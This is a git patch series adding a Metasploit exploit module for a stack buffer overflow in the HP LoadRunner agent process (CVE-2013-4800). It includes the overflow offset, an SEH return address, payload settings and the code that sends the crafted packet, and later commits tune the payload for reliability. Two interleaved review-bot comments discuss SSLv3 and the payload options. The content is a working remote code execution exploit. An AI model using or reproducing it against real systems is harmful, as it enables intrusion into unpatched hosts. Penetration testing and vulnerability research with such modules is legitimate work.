From 39eb20e33a9b94042250c2cce821be2d2e0f4c30 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Thu, 3 Oct 2013 16:52:20 -0500
Subject: [PATCH 1/3] Add module for ZDI-13-169
---
 .../windows/misc/hp_loadrunner_magentproc.rb | 82 +++++++++++++++++++
 1 file changed, 82 insertions(+)
 create mode 100644 modules/exploits/windows/misc/hp_loadrunner_magentproc.rb
diff --git a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb
new file mode 100644
index 0000000000..b1e228d22c
--- /dev/null
+++ b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb
@@ -0,0 +1,82 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::Seh
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'HP LoadRunner magentproc.exe Overflow',
+ 'Description' => %q{
+ This module exploits a stack buffer overflow in HP LoadRunner before 11.52. The
+ vulnerability exists on the LoadRunner Agent Process magentproc.exe. By sending
+ a specially crafted packet, an attacker may be able to execute arbitrary code.
+ },
+ 'Author' =>
+ [
+ 'Unknown', # Original discovery # From Tenable Network Security
+ 'juan vazquez' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['CVE', '2013-4800'],
+ ['OSVDB', '95644'],
+ ['http://www.zerodayinitiative.com/advisories/ZDI-13-169/']
+ ],
+ 'Privileged' => false,
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'seh',
+ 'SSL' => true,
+ 'SSLVersion' => 'SSL3'
+ },
+ 'Payload' =>
+ {
+ 'Space' => 5724, # without rop chain
+ 'StackAdjustment' => -3500,
+ 'BadChars' => "\x00"
+ },
+ 'Platform' => 'win',
+ 'DefaultTarget' => 0,
+ 'Targets' =>
+ [
+ [
+ 'Windows XP SP3 / HP LoadRunner 11.50',
+ {
+ # magentproc.exe 11.0.0.1002
+ 'Offset' => 1104,
+ 'Ret' => 0x7ffc070e, # ppr # from NLS tables # Tested stable over Windows XP SP3 updates
+ 'Crash' => 10000 # Length needed to ensure an exception
+ }
+ ]
+ ],
+ 'DisclosureDate' => 'Jul 27 2013'))
+
+ register_options([Opt::RPORT(443)], self.class)
+ end
+
+ def exploit
+
+ req = [0xffffffff].pack("N") # Fake Length
+ req << rand_text(target['Offset'])
+ req << generate_seh_record(target.ret)
+ req << payload.encoded
+ req << rand_text(target['Crash'])
+
+ connect
+ print_status("sending 1")
+ sock.put(req)
+ disconnect
+
+ end
+end
From 5971fe87f5f6120bb2ba5386e364a780e5568ed8 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Thu, 3 Oct 2013 17:19:53 -0500
Subject: [PATCH 2/3] Improve reliability
---
 .../windows/misc/hp_loadrunner_magentproc.rb | 15 ++++++++-------
 1 file changed, 8 insertions(+), 7 deletions(-)
diff --git a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb
index b1e228d22c..ba0af35247 100644
--- a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb
+++ b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb
@@ -36,15 +36,16 @@ class Metasploit3 < Msf::Exploit::Remote
 'Privileged' => false,
 'DefaultOptions' =>
 {
- 'EXITFUNC' => 'seh',
 'SSL' => true,
- 'SSLVersion' => 'SSL3'
+ 'SSLVersion' => 'SSL3',
+ 'PrependMigrate' => true
 },
 'Payload' =>
 {
- 'Space' => 5724, # without rop chain
- 'StackAdjustment' => -3500,
- 'BadChars' => "\x00"
+ 'Space' => 4096,
+ 'DisableNops' => true,
+ 'BadChars' => "\x00",
+ 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
 },
 'Platform' => 'win',
 'DefaultTarget' => 0,
@@ -56,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
 # magentproc.exe 11.0.0.1002
 'Offset' => 1104,
 'Ret' => 0x7ffc070e, # ppr # from NLS tables # Tested stable over Windows XP SP3 updates
- 'Crash' => 10000 # Length needed to ensure an exception
+ 'Crash' => 6000 # Length needed to ensure an exception
 }
 ]
 ],
@@ -74,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
 req << rand_text(target['Crash'])
 
 connect
- print_status("sending 1")
+ print_status("Sending malicious request...")
 sock.put(req)
 disconnect
 
From 646429b4dd0fd705cb40265a2fa777a1a6a10add Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Thu, 3 Oct 2013 22:15:17 -0500
Subject: [PATCH 3/3] Put ready to pull request
---
 modules/exploits/windows/misc/hp_loadrunner_magentproc.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
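Review bot: `'SSLVersion' => 'SSL3'` in DefaultOptions pins the handshake to SSLv3, a protocol that current OpenSSL builds commonly compile out, so on such a framework host the `connect` call in `exploit` will fail before anything is sent and the error will look like a target problem rather than a local one; if the agent was observed to accept only SSLv3, record that beside the option, e.g. `'SSLVersion' => 'SSL3', # agent observed negotiating SSLv3 only — verify on newer builds`. Within `exploit` the target table is read two ways, `target['Offset']` and `target['Crash']` against `target.ret`, and using `target['Ret']` alongside the other two would read uniformly. The stray blank lines directly after `def exploit` and before its closing `end` are also worth dropping. Both `initialize` and `exploit` close within this hunk.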
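Review bot: The Payload and DefaultOptions edits in the first hunk carry no explanation beyond the commit title: `'Space'` drops from 5724 to 4096, `'DisableNops' => true` and `'PrependMigrate' => true` appear without a comment, and the declarative `'StackAdjustment' => -3500` is replaced by a hand-encoded `'PrependEncoder'` whose only link to that value is the trailing comment. A reader cannot tell why the framework option was insufficient or what padding `DisableNops` is there to avoid, so each line should say so, e.g. `'DisableNops' => true, # TODO(review): state why padding the payload out to Space must be avoided here` and a comment on `PrependEncoder` naming the reason the StackAdjustment option was abandoned. The double-hash comment `# Stack adjustment # add esp, -3500` should be collapsed into one, `# stack adjustment: add esp, -3500`. The two later hunks of this patch (`'Crash' => 6000` and the print_status message) need nothing further.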
diff --git a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb
index ba0af35247..a028d0f990 100644
--- a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb
+++ b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb
@@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
 [
 'Windows XP SP3 / HP LoadRunner 11.50',
 {
- # magentproc.exe 11.0.0.1002
+ # magentproc.exe 11.50.2042.0
 'Offset' => 1104,
 'Ret' => 0x7ffc070e, # ppr # from NLS tables # Tested stable over Windows XP SP3 updates
 'Crash' => 6000 # Length needed to ensure an exception